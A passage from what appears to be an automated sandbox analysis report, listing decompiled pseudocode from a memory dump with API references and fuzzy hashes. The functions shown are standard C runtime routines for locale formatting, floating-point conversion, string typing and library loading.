				asm("movups xmm0, [eax+0x10]");
				asm("movups [ebp-0x38], xmm0");
				asm("movq xmm0, [eax+0x20]");
				asm("movq [ebp-0x28], xmm0");
				_v44 =  *((intOrPtr*)(_t57 + 0x28));
				 *(_t96 + 8) = 0;
				 *(_t96 + 0x10) = 0;
				 *(_t96 + 0x14) = 0;
				_v16 = 0;
				_t117 =  *((char*)(_t85 + 0xc));
				if( *((char*)(_t85 + 0xc)) == 0) {
					_v92 =  *(_t93 + 8);
				} else {
					_v92 = 0x6d50f4bd;
				}
				_t61 = E6D47A6A8(_t117,  &_v196);
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x88], xmm0");
				asm("movups xmm0, [eax+0x10]");
				asm("movups [ebp-0x78], xmm0");
				asm("movq xmm0, [eax+0x20]");
				asm("movq [ebp-0x68], xmm0");
				_v108 =  *((intOrPtr*)(_t61 + 0x28));
				_push( &_v148);
				_push(0);
				 *(_t96 + 8) = E6D462C90(_t91, _t100, _v92);
				_push( &_v84);
				 *(_t96 + 0x10) = E6D452240(_t85, _t93, _t96, "false", 0);
				_push( &_v84);
				 *(_t96 + 0x14) = E6D452240(_t85, _t93, _t96, "true", 0);
				_v16 = 0xffffffff;
				if( *((char*)(_t85 + 0xc)) == 0) {
					 *((short*)(_t96 + 0xc)) =  *( *(_t93 + 0x30)) & 0x0000ffff;
					_t72 =  *( *(_t93 + 0x34)) & 0x0000ffff;
				} else {
					_v88 = 0x2e;
					_v92 = 0;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x58], xmm0");
					E6D4767B0(_t86,  &_v92,  &_v88, 1,  &_v100,  &_v84);
					 *((short*)(_t96 + 0xc)) = _v92 & 0x0000ffff;
					_v88 = 0x2c;
					_v92 = 0;
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x58], xmm0");
					E6D4767B0(_t86,  &_v92,  &_v88, 1,  &_v100,  &_v84);
					_t72 = _v92 & 0x0000ffff;
				}
				 *(_t96 + 0xe) = _t72;
				 *[fs:0x0] = _v24;
				return E6D4903E3(_v40 ^ _t100);
			}

0x6d460200
0x6d460200
0x6d460201
0x6d460209
0x6d460210
0x6d460214
0x6d460216
0x6d460218
0x6d460223
0x6d460224
0x6d460225
0x6d46022c
0x6d460231
0x6d460233
0x6d460236
0x6d460237
0x6d460238
0x6d46023c
0x6d460242
0x6d460245
0x6d460247
0x6d46024f
0x6d460258
0x6d460260
0x6d460263
0x6d460267
0x6d46026b
0x6d46026f
0x6d460274
0x6d46027c
0x6d46027f
0x6d460286
0x6d46028d
0x6d460294
0x6d46029b
0x6d46029f
0x6d4602ad
0x6d4602a1
0x6d4602a1
0x6d4602a1
0x6d4602b7
0x6d4602bf
0x6d4602c2
0x6d4602c9
0x6d4602cd
0x6d4602d1
0x6d4602d6
0x6d4602de
0x6d4602e7
0x6d4602e8
0x6d4602f5
0x6d4602fb
0x6d46030b
0x6d460311
0x6d460321
0x6d460324
0x6d46032f
0x6d4603c5
0x6d4603cc
0x6d460335
0x6d460335
0x6d460339
0x6d460340
0x6d460343
0x6d46035a
0x6d460366
0x6d46036a
0x6d46036e
0x6d460375
0x6d460378
0x6d46038f
0x6d460397
0x6d460397
0x6d46039b
0x6d4603a2
0x6d4603bc

APIs

__Getcvt.LIBCPMT ref: 6D460258
__Getcvt.LIBCPMT ref: 6D4602B7

Strings

true, xrefs: 6D460314
false, xrefs: 6D4602FE

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: f88de54de1948cf083f5532426abaa8ba695a657ceaa9ba1695e638f17ea8b99
Instruction ID: 8876010693cc8eb9b2ca1ac684ec1260a9adf825fc054d6eadb56ea009f3bc8b
Opcode Fuzzy Hash: f88de54de1948cf083f5532426abaa8ba695a657ceaa9ba1695e638f17ea8b99
Instruction Fuzzy Hash: 595193B1C047589FDB11CFE4C840BEEBBB8FF18304F04825AE955AB241EB74A984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C18EF, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D4C18EF(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				void* _t195;

				_t195 = __fp0;
				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6D49C92A(0,  &_v52, _t171, _t195, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E6D4D60C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E6D4D60C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E6D492AF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E6D4D60C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E6D4D61F0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E6D4D61F0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E6D4D61F0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E6D4C1BF2(0, _t142, 0, _t195, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E6D4D63B0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E6D4B41F9();
					_t183 = 0x22;
					 *_t129 = _t183;
					E6D4B40C8();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x6d4c18ef
0x6d4c18ef
0x6d4c18fa
0x6d4c1901
0x6d4c1903
0x6d4c1903
0x6d4c1905
0x6d4c190e
0x6d4c1910
0x6d4c1915
0x6d4c191b
0x6d4c1931
0x6d4c1936
0x6d4c1939
0x6d4c1946
0x6d4c194b
0x6d4c199f
0x6d4c19a7
0x6d4c19a9
0x6d4c19ab
0x6d4c19ae
0x6d4c19ae
0x6d4c19ae
0x6d4c19b4
0x6d4c19bc
0x6d4c19cf
0x6d4c19d2
0x6d4c19d4
0x6d4c19d7
0x6d4c19d8
0x6d4c19f9
0x6d4c19fc
0x6d4c19fc
0x6d4c19da
0x6d4c19da
0x6d4c19dc
0x6d4c19e7
0x6d4c19e7
0x6d4c19e9
0x6d4c19f0
0x6d4c19eb
0x6d4c19eb
0x6d4c19eb
0x6d4c19e9
0x6d4c19fd
0x6d4c19ff
0x6d4c1a00
0x6d4c1a03
0x6d4c1a05
0x6d4c1a0f
0x6d4c1a19
0x6d4c1a07
0x6d4c1a07
0x6d4c1a07
0x6d4c1a1e
0x6d4c1a1e
0x6d4c1a23
0x6d4c1a26
0x6d4c1a31
0x6d4c1a31
0x6d4c1a31
0x6d4c1a31
0x6d4c1a35
0x6d4c1a3c
0x6d4c1a3d
0x6d4c1a40
0x6d4c1a43
0x6d4c1a43
0x6d4c1a45
0x00000000
0x00000000
0x6d4c1a5d
0x6d4c1a64
0x6d4c1a68
0x6d4c1a6b
0x6d4c1a6e
0x6d4c1a70
0x6d4c1a70
0x6d4c1a70
0x6d4c1a72
0x6d4c1a75
0x6d4c1a78
0x6d4c1a7a
0x6d4c1a82
0x6d4c1a88
0x6d4c1a8b
0x6d4c1a8e
0x6d4c1a8f
0x6d4c1a92
0x6d4c1a95
0x6d4c1a95
0x6d4c1a9a
0x6d4c1a9d
0x00000000
0x00000000
0x6d4c1ab5
0x6d4c1aba
0x6d4c1abe
0x00000000
0x00000000
0x6d4c1ac2
0x6d4c1ac5
0x6d4c1ac6
0x6d4c1ac6
0x6d4c1ac8
0x6d4c1acb
0x00000000
0x00000000
0x6d4c1acd
0x6d4c1ad0
0x6d4c1ad7
0x6d4c1ada
0x6d4c1add
0x6d4c1af3
0x6d4c1af3
0x6d4c1af3
0x6d4c1adf
0x6d4c1adf
0x6d4c1ae1
0x6d4c1ae4
0x6d4c1aef
0x6d4c1ae6
0x6d4c1ae9
0x6d4c1ae9
0x6d4c1ae4
0x00000000
0x6d4c1add
0x6d4c1ad2
0x6d4c1ad2
0x6d4c1ad4
0x6d4c1ad4
0x6d4c1a28
0x6d4c1a28
0x6d4c1a2b
0x6d4c1af6
0x6d4c1af6
0x6d4c1af8
0x6d4c1afa
0x6d4c1afd
0x6d4c1afe
0x6d4c1aff
0x6d4c1b00
0x6d4c1b08
0x6d4c1b08
0x6d4c1b08
0x6d4c1b0a
0x6d4c1b0d
0x6d4c1b10
0x6d4c1b12
0x6d4c1b12
0x6d4c1b14
0x6d4c1b26
0x6d4c1b2a
0x6d4c1b2d
0x6d4c1b34
0x6d4c1b3c
0x6d4c1b3c
0x6d4c1b3f
0x6d4c1b41
0x6d4c1b52
0x6d4c1b52
0x6d4c1b56
0x6d4c1b56
0x6d4c1b59
0x6d4c1b5b
0x6d4c1b5e
0x00000000
0x6d4c1b43
0x6d4c1b43
0x6d4c1b49
0x6d4c1b49
0x6d4c1b4d
0x6d4c1b60
0x6d4c1b60
0x6d4c1b64
0x6d4c1b65
0x6d4c1b67
0x6d4c1b69
0x6d4c1baa
0x6d4c1baa
0x6d4c1bac
0x6d4c1bb9
0x6d4c1bb9
0x6d4c1bbb
0x6d4c1bbd
0x6d4c1bbe
0x6d4c1bbf
0x6d4c1bc6
0x6d4c1bc9
0x6d4c1bcb
0x6d4c1bcb
0x6d4c1bcc
0x6d4c1bce
0x6d4c1bd1
0x6d4c1bd1
0x6d4c1bd3
0x6d4c1bd5
0x00000000
0x6d4c1bd5
0x6d4c1bae
0x6d4c1bb0
0x00000000
0x00000000
0x6d4c1bb2
0x00000000
0x00000000
0x6d4c1bb4
0x6d4c1bb7
0x00000000
0x00000000
0x00000000
0x6d4c1bb7
0x6d4c1b70
0x6d4c1b76
0x6d4c1b76
0x6d4c1b78
0x6d4c1b79
0x6d4c1b7a
0x6d4c1b7b
0x6d4c1b82
0x6d4c1b85
0x6d4c1b87
0x6d4c1b88
0x6d4c1b8a
0x6d4c1b97
0x6d4c1b97
0x6d4c1b99
0x6d4c1b9b
0x6d4c1b9c
0x6d4c1b9d
0x6d4c1ba4
0x6d4c1ba7
0x6d4c1ba9
0x6d4c1ba9
0x00000000
0x6d4c1ba9
0x6d4c1b8c
0x6d4c1b8c
0x6d4c1b8e
0x00000000
0x00000000
0x6d4c1b90
0x00000000
0x00000000
0x6d4c1b92
0x6d4c1b95
0x00000000
0x00000000
0x00000000
0x6d4c1b95
0x6d4c1b72
0x6d4c1b74
0x00000000
0x00000000
0x00000000
0x6d4c1b74
0x6d4c1b45
0x6d4c1b47
0x00000000
0x00000000
0x00000000
0x6d4c1b47
0x6d4c1b41
0x00000000
0x6d4c1a2b
0x6d4c1a26
0x6d4c194d
0x6d4c194f
0x00000000
0x6d4c1951
0x6d4c1967
0x6d4c196c
0x6d4c196e
0x6d4c197a
0x6d4c1980
0x6d4c1981
0x6d4c1983
0x6d4c1985
0x6d4c1990
0x6d4c1990
0x6d4c1993
0x6d4c1995
0x6d4c1995
0x6d4c1998
0x6d4c1970
0x6d4c1970
0x6d4c1970
0x00000000
0x6d4c196e
0x6d4c191d
0x6d4c191d
0x6d4c1924
0x6d4c1925
0x6d4c1927
0x6d4c1bd9
0x6d4c1bdd
0x6d4c1be2
0x6d4c1be2
0x6d4c1bf1
0x6d4c1bf1

APIs

_strrchr.LIBCMT ref: 6D4C197A
__alldvrm.LIBCMT ref: 6D4C1B7B
__alldvrm.LIBCMT ref: 6D4C1B9D

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 8e20228992ac4f878050e6b93774e1859ad2de3e9488b775846a1f46f7749188
Instruction ID: 1dfe21766bc9e72f2ee19d57164aa36deea68babf4e6145c5b043eb2c133f0eb
Opcode Fuzzy Hash: 8e20228992ac4f878050e6b93774e1859ad2de3e9488b775846a1f46f7749188
Instruction Fuzzy Hash: 11A1587A9043869FE702CF58C890FAEBBE4EF52350F2441ADD5959B381E3358D42CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6D4C3F56(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x6d534074; // 0x286e79ba
				_v8 = _t34 ^ _t70;
				E6D49C92A(__ebx,  &_v28, __edx, __fp0, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6D4903E3(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E6D492AF0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E6D47AAFA(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E6D4C1817(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6D490FA0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x6d4c3f5e
0x6d4c3f65
0x6d4c3f71
0x6d4c3f76
0x6d4c3f7b
0x6d4c3f80
0x6d4c3f83
0x6d4c3f85
0x6d4c3f85
0x6d4c3f8a
0x6d4c3fa3
0x6d4c3fa9
0x6d4c3fae
0x6d4c404d
0x6d4c4051
0x6d4c4056
0x6d4c4056
0x6d4c4072
0x6d4c4072
0x6d4c3fb4
0x6d4c3fbc
0x6d4c3fc0
0x6d4c400c
0x6d4c400e
0x6d4c4010
0x6d4c4015
0x6d4c402c
0x6d4c4034
0x6d4c4044
0x6d4c4044
0x6d4c4034
0x6d4c4046
0x6d4c4047
0x00000000
0x6d4c404c
0x6d4c3fc7
0x6d4c3fc9
0x6d4c3fcb
0x6d4c3fd3
0x6d4c3ff0
0x6d4c3ffa
0x6d4c3fff
0x00000000
0x00000000
0x6d4c4001
0x6d4c4007
0x6d4c4007
0x00000000
0x6d4c4007
0x6d4c3fd7
0x6d4c3fdb
0x6d4c3fe0
0x6d4c3fe4
0x00000000
0x00000000
0x6d4c3fe6
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: HeapAlloc.KERNEL32(00000000,00000001,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4C1849

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 543f3496db7b19c4f6e4899b7c90fe9efc71b9fb0b5aebc8129319178a4998fc
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 543f3496db7b19c4f6e4899b7c90fe9efc71b9fb0b5aebc8129319178a4998fc
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C45E6, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6D4C45E6(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6d540950 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6d507688 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x286e79bb
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x6d4c45eb
0x6d4c45ef
0x6d4c45f6
0x6d4c45fa
0x6d4c4608
0x6d4c461e
0x6d4c4622
0x6d4c464b
0x6d4c464d
0x6d4c4651
0x6d4c4654
0x6d4c4654
0x6d4c465a
0x6d4c465c
0x00000000
0x6d4c465d
0x6d4c4624
0x6d4c462d
0x6d4c463c
0x6d4c462f
0x6d4c4632
0x6d4c4638
0x6d4c4638
0x6d4c4640
0x00000000
0x6d4c4642
0x6d4c4645
0x6d4c4647
0x00000000
0x6d4c4647
0x6d4c4640
0x6d4c45fc
0x6d4c4601
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,6D45140C,00000000,00000000,?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue), ref: 6D4C4618
GetLastError.KERNEL32(?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue,6D507C50,FlsSetValue,00000000,00000364,?,6D4BDF29), ref: 6D4C4624
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4C458D,6D45140C,00000000,00000000,00000000,?,6D4C4924,00000006,FlsSetValue,6D507C50,FlsSetValue,00000000), ref: 6D4C4632

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction ID: bd82ea86bdca110e910f3701ce1c0883a881a8a9b646d3c04cbb85fb896ebdc8
Opcode Fuzzy Hash: 63f4d9ece53f847d87a470fe0be977a71b850d009b13cfe54b5dad9990190a53
Instruction Fuzzy Hash: D501D43A755223ABCF114E7DCE44E567BA8AB0ABF17260225F919D3244DB24EC01CAE5

Uniqueness

Uniqueness Score: -1.00%

Function 6D479031, Relevance: 6.0, APIs: 4, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E6D479031(void* __eflags, intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v68;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t36;
				void* _t37;

				_t36 = _t35 - 0xc;
				E6D478DE1( &_v16, _a4);
				E6D4924F4( &_v16, 0x6d530900);
				asm("int3");
				_push(_t35);
				_t32 = _t36;
				_t37 = _t36 - 0xc;
				E6D478E1B( &_v44, _v24);
				E6D4924F4( &_v44, 0x6d53093c);
				asm("int3");
				_push(_t32);
				_t33 = _t37;
				E6D478E5E( &_v52, _v28);
